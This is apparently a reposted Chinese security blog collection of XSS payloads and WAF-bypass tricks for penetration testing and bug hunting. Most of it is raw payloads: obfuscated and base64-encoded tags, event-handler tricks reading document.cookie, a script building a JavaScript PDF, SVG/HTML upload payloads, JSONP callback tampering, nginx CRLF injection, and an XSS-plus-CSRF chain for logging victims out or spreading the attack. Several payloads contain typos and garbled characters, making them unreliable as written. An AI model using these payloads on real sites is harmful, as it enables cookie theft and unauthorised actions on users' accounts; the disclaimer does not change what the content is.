文章总结： 本文分享XSS挖掘与绕WAF实战经验，建议使用无害标签探测解析，逐步测试绕过策略。涵盖大量标签混淆、编码及事件触发Payload，涉及PDF/SVG文件上传、Swagger、JSONP及NginxCRLF注入等特殊场景。同时分析了XSS结合CSRF的攻击手法，为渗透测试提供丰富的Payload参考与利用思路。 综合评分： 83 文章分类： WEB安全,漏洞POC,渗透测试,实战经验,漏洞分析

<script$20type="text/javascript">%20var%20reg%20=%20/test/;%20var%20str%20=%20%27testString%27;%20var%20result%20=%20reg.exec(str);%20alert(result);%20</script>

<iframe src="data:text/html;base64,PFNDcmlwdD5hbGVydCgxKTwvU0NyaXB0Pg=="></iframe

解码之后是这个

<iframe&nbsp;src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>

解码之后是：

<iframesrc="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQR0YxWkdsdklITnlZejB4SUc5dVpYSnliM0k5WTI5dVptbHliU2duZUhOemMzTW5LVDQ9Pjwvb2JqZWN0Pg=="></iframe>

几个冷门的xss:

"\"><s>[email protected] 邮箱xss
<sTylE OnloAd=alert(1)>

<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=prompt,a()$20x>
<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=confirm,a()$20x>
<dETAILS%OAopen&OAonToGgle*OA=&0Aa=confirm,a(document.cookie）%20x>
<svg%20onmouseover&0A=0Aa=confirm,a(1)>
<svg%0Aonmouseover&0A=&0Aa=confirm,a(1)%20x>
<svg&20onmouseover&0A=&0Aa=confirm,a(document.cookie)>

'+onclick=a=alert,a(1)%2F%2F
'+onclick=a=alert,a(1)--+
'+onclick=a=confirm,a(1)--+
'+onclick=a=confirm,a(1)%2F%2F
'%27+onclick='a=alert,a(1)'--+
在对xss 标签进行注释的时候要使用--+和// ，经测试%23无效。如果onload不能用就换成其他属性。

<marquee behavior="alternate" onstart=alert (1)>123</marquee><MaRQuEe BehAvIor="alternate" onStArt=alert(1)>123</MaRQuEe><body onpageshow=alert (1)>
<body onPAgeShoW=confirm(111)>
<details ontoggle=alert ()>
向下按钮 xss
<SVg </onLoaD ="1> (_=prompt,_(1)) "">
<script>eval (atob('YWxlcnQoZG9jdw1lbnQuY29va211KTs='));</script>

<d3"<"/onclick="1>[confirm`"]"<">dianwo
需要点击
<w="/x="y>"/oNCliCk=`<`[confir\u006d"`]>dianwo<w="/x="y>"/ondblclick=<^[confir\u006d``]>dianwo2双击
需要点击
需要
<w="/x="y>"/oNDb1CliCk=`<`[confir\u006d`]>dianwo2双击
需要
<!*/*"/*/*/*/"/*--></Script><Image SrcSet=K */ ;OnError=confirm^1` //>
<img/src/onerror=\u0061\u006c\u0065\u0072\u0074(1)><object data=javascript:alert(1)>
<svg onload=setInterval`alert\x28document.domain\x29`>
<img src=1 onerror=javascript: {{. ('alert(1)) ()}}><a href=javascript: {{. ('alert(1) ') ()))>dianwo</a>
点击一次
点击一次
<a href=javascript:<x ng-app>{{. ('alert(1) ;) ()}}>dianwo</a>点击一次
<a href=javascript:{{.('alert(1)')()}}>dianwo</a>点击一次
<d3"<"/onclick="1>[confirm``]"<">dianwo 点击一次
<d3"<"/oNDblCliCk="1>[confirm``]"<">dianwo 需要双击
%00EEEE<svg/\/\//ONLoad='a\u006c\u0065\u0072\u0074(1)'/\/\/\>svg>
<svg><set end=1 onend=[1] .find(alert)>
<body onpageshow="alert(1)">
<detail open ontoggle=alert(1)> &nbsp;可能不会弹窗 但也会有xss
<details open ontoggle=\u0061\u006c\u0065\u0072\u0074(1)>
<details%20ontoggle=confirm()>//
#弹窗！

上面的只要通杀 全是高危 甚至严重。

5. pdfxss:低-无危害

from PyPDF2 import PdfWriterwriter = PdfWriter()writer.add_js("app.alert(document.cookie);")with open("xss_payload.pdf", "wb") as f:   writer.write(f)

6. htmlxss:中-低危

上传一个html文件： 内容为：

<script>alert(1)</script>

7. svgxss:中-低危

创建一个svg文件 内容如下 然后传上去就完事了

<svg&nbsp;xmlns="http://www.w3.org/2000/svg”version="1.1"><circle&nbsp;cx="100"cy="50"r="40"stroke="black”stroke-width="2"fill="red"/><script>alert(1)</script></svg>

8. 其他xss:

8.1. swagger -xss

8.2. jsonp:

这里直接更改jsoncallback=后面的值就可以了

有时候也叫callback

可以混一个漏洞~~ 主站基本就是高危 旁站低危

8.3. nginx：

回车换行漏洞：

第一次回车换行为插入到cookie位置的栏 写一次%0a%0d

第二次回车换行为插入到返回包渲染位置的栏 写两次%0a%0d

也就是说可以直接写入xsspayload

浏览器渲染了就是有漏洞

8.4. 编辑器处的链接xss:

"<script>alert(1)</script>
<script>alert(2)</script>
medium--> É‹•'Ê£ˆý£ˆ<sc<script>ript>alert(4)</script>
'6b;P">iIÝɇ'ý£ˆ<ScRiPt>alert(5)</script>
<img src=1 onerror=alert(7)>
onmouseover=¡⁻alert(9)¡⁻
<script>alert(11);</script>
>"'><img src="javascript.:alert(12)">
>"><script>alert(13)</script>
<table background='javascript.:alert(14)'></table>
<object type=text/html
data='javascript.:alert(15);'></object>
&nbsp; "+alert(16)+"

8.5. xss+csrf：

csrf：让用户在不知情的情况下，访问一些会对用户造成影响的路径

比如：支付 转账 登陆退出 更改账密 更改头像等

xss：网站没有对用户的输入进行过滤 导致可以实现用户输入的内容被当作javascript进行执行。

javascript可以实现对指定网站指定路径的访问。

所以只要使用xss实现csrf就会出现很多更高危害的漏洞

例如：

当用户查看你的头像 或者加载了你的昵称的时候 让他直接登录退出，或者改成你的头像，昵称等 进一步传播这个漏洞。

这里是一个大佬的记录：

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：week的杂货铺 网安热爱者week 网安热爱者week《网上找到的各种xss记录》